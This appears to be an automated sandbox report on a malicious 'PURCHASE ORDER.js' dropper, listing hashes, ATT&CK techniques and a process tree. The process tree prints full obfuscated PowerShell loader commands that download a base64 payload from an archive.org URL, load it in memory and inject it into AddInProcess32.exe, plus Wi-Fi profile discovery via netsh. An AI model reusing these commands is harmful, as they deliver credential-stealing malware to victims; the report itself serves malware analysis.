Analysis
-
max time kernel
94s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20-09-2024 18:16
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE ORDER.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PURCHASE ORDER.js
Resource
win10v2004-20240802-en
General
-
Target
PURCHASE ORDER.js
-
Size
319KB
-
MD5
e8114157714655fdbc7b51cde4f676de
-
SHA1
c23a2b3c76b2b7927f64cf74c3cf75b408a629e4
-
SHA256
d20d1cb56afa7818be3b26074bed7eae73e5480a5a8e0add5384bc9eddbc333d
-
SHA512
9f33a77504f56f4b0bce859d3b61f81cf3496a00d6cfd3aaef708f700149c72f1fb009f15e720a59b013a443c15b3c68a621358c624138b72f3409db53692c8b
-
SSDEEP
6144:1m06WlUzat6poIKNrZUG8IyWwmRn+CvA1HPucBzprZa8qYlVLY8/1PcKpOu4:w06WF6poIKN9UGDykRn+gA1HPu4zpNar
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 1980 powershell.exe 39 1980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3416 powershell.exe 1980 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation wscript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 icanhazip.com 56 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1980 set thread context of 548 1980 powershell.exe 95 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2512 cmd.exe 3696 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 AddInProcess32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3416 powershell.exe 3416 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 548 AddInProcess32.exe 548 AddInProcess32.exe 548 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 548 AddInProcess32.exe Token: SeSecurityPrivilege 3312 msiexec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4840 wrote to memory of 3416 4840 wscript.exe 82 PID 4840 wrote to memory of 3416 4840 wscript.exe 82 PID 3416 wrote to memory of 1980 3416 powershell.exe 84 PID 3416 wrote to memory of 1980 3416 powershell.exe 84 PID 1980 wrote to memory of 4332 1980 powershell.exe 94 PID 1980 wrote to memory of 4332 1980 powershell.exe 94 PID 1980 wrote to memory of 4332 1980 powershell.exe 94 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 1980 wrote to memory of 548 1980 powershell.exe 95 PID 548 wrote to memory of 2512 548 AddInProcess32.exe 96 PID 548 wrote to memory of 2512 548 AddInProcess32.exe 96 PID 548 wrote to memory of 2512 548 AddInProcess32.exe 96 PID 2512 wrote to memory of 2828 2512 cmd.exe 99 PID 2512 wrote to memory of 2828 2512 cmd.exe 99 PID 2512 wrote to memory of 2828 2512 cmd.exe 99 PID 2512 wrote to memory of 3696 2512 cmd.exe 100 PID 2512 wrote to memory of 3696 2512 cmd.exe 100 PID 2512 wrote to memory of 3696 2512 cmd.exe 100 PID 2512 wrote to memory of 2452 2512 cmd.exe 101 PID 2512 wrote to memory of 2452 2512 cmd.exe 101 PID 2512 wrote to memory of 2452 2512 cmd.exe 101 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGIATQBCAHUAcgBsACcAKwAnACAAPQAgAE4AVwAnACsAJwBxAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwArACcALwAnACsAJwBpAGEAJwArACcAOQAnACsAJwAwADQAJwArACcANgAwACcAKwAnADEALgB1AHMALgBhAHIAJwArACcAYwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0ACcAKwAnAGUAbQBzAC8AZABlAHQAYQBoACcAKwAnAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAZQBKAC4AdAB4AHQATgBXAHEAOwBiAE0AQgBiACcAKwAnAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACAAJwArACcAPQAnACsAJwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AJwArACcATgAnACsAJwBlAHQALgAnACsAJwBXAGUAYgBDAGwAaQBlAG4AdAApAC4AJwArACcARABvAHcAbgAnACsAJwBsAG8AYQBkACcAKwAnAFMAJwArACcAdAByAGkAbgBnACgAYgBNAEIAdQByAGwAJwArACcAKQA7AGIATQAnACsAJwBCAGIAJwArACcAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAIAA9ACAAJwArACcAWwAnACsAJwBTAHkAcwB0AGUAbQAuACcAKwAnAEMAJwArACcAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwAnACsAJwBlACcAKwAnADYANABTACcAKwAnAHQAcgBpAG4AZwAoAGIATQBCAGIAJwArACcAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwBuAHQAZQBuAHQAKQAnACsAJwA7AGIATQAnACsAJwBCAGEAJwArACcAcwBzAGUAbQBiACcAKwAnAGwAeQAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQAnACsAJwBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGIATQBCAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAKQA7AGIATQAnACsAJwBCAHQAeQBwAGUAIAA9ACAAYgBNAEIAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5ACcAKwAnAHAAJwArACcAZQAoAE4AJwArACcAVwBxAFIAdQAnACsAJwBuAFAARQAuAEgAbwAnACsAJwBtAGUATgBXAHEAKQA7AGIATQBCAG0AZQB0AGgAbwBkACAAPQAgAGIATQBCAHQAeQBwAGUALgAnACsAJwBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAE4AVwBxAFYAQQBJAE4AVwBxACkAOwBiACcAKwAnAE0AQgAnACsAJwBtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAYgBNAEIAbgB1ACcAKwAnAGwAbAAsACAAWwBvAGIAagAnACsAJwBlACcAKwAnAGMAdABbAF0AXQBAACgATgBXAHEAdAB4AHQAJwArACcALgBhAGYAYQAvAHYAZQBkAC4AJwArACcAMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgAnACsAJwBjADAAJwArACcAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAnACsAJwAyAC0AYgB1AHAALwAvADoAcwBwACcAKwAnAHQAdABoAE4AVwBxACcAKwAnACAALAAgAE4AVwBxAGQAZQBzAGEAJwArACcAdABpAHYAJwArACcAYQBkAG8ATgBXAHEAIAAnACsAJwAsACAAJwArACcATgAnACsAJwBXAHEAZABlAHMAYQB0AGkAdgBhAGQAbwBOAFcAcQAgACcAKwAnACwAIABOAFcAcQAnACsAJwBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAE4AVwBxACwAJwArACcATgBXAHEAQQAnACsAJwBkAGQAJwArACcASQBuACcAKwAnAFAAcgBvAGMAZQAnACsAJwBzAHMAMwAyAE4AVwBxACwATgAnACsAJwBXAHEAZABlACcAKwAnAHMAYQAnACsAJwB0ACcAKwAnAGkAdgBhACcAKwAnAGQAJwArACcAbwBOAFcAJwArACcAcQApACkAJwArACcAOwAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA5ADgAKwBbAGMASABhAFIAXQA3ADcAKwBbAGMASABhAFIAXQA2ADYAKQAsACcAJAAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA3ADgAKwBbAGMASABhAFIAXQA4ADcAKwBbAGMASABhAFIAXQAxADEAMwApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADMAOQApAHwAIAAuACgAIAAkAHAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBoAE8AbQBlAFsAMwA0AF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bMBurl'+' = NW'+'qhttps:'+'/'+'/'+'ia'+'9'+'04'+'60'+'1.us.ar'+'chive.org'+'/6/'+'it'+'ems/detah'+'-note-j/Detah'+'NoteJ.txtNWq;bMBb'+'ase64Content '+'='+' (New-Object System.'+'N'+'et.'+'WebClient).'+'Down'+'load'+'S'+'tring(bMBurl'+');bM'+'Bb'+'in'+'aryContent = '+'['+'System.'+'C'+'onvert]::FromBas'+'e'+'64S'+'tring(bMBb'+'as'+'e64C'+'ontent)'+';bM'+'Ba'+'ssemb'+'ly = [Reflecti'+'on.Assembly]::Load(bMBbin'+'aryContent);bM'+'Btype = bMBassembly.GetTy'+'p'+'e(N'+'WqRu'+'nPE.Ho'+'meNWq);bMBmethod = bMBtype.'+'Get'+'M'+'ethod(NWqVAINWq);b'+'MB'+'method.Invoke(bMBnu'+'ll, [obj'+'e'+'ct[]]@(NWqtxt'+'.afa/ved.'+'2r.39b345302a075b1b'+'c0'+'d45b632eb9ee6'+'2-bup//:sp'+'tthNWq'+' , NWqdesa'+'tiv'+'adoNWq '+', '+'N'+'WqdesativadoNWq '+', NWq'+'desativa'+'doNWq,'+'NWqA'+'dd'+'In'+'Proce'+'ss32NWq,N'+'Wqde'+'sa'+'t'+'iva'+'d'+'oNW'+'q))'+';').REPLaCE(([cHaR]98+[cHaR]77+[cHaR]66),'$').REPLaCE(([cHaR]78+[cHaR]87+[cHaR]113),[stRInG][cHaR]39)| .( $pSHome[21]+$pshOme[34]+'X')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:4332
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:548 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3696
-
-
C:\Windows\SysWOW64\findstr.exefindstr All6⤵
- System Location Discovery: System Language Discovery
PID:2452
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82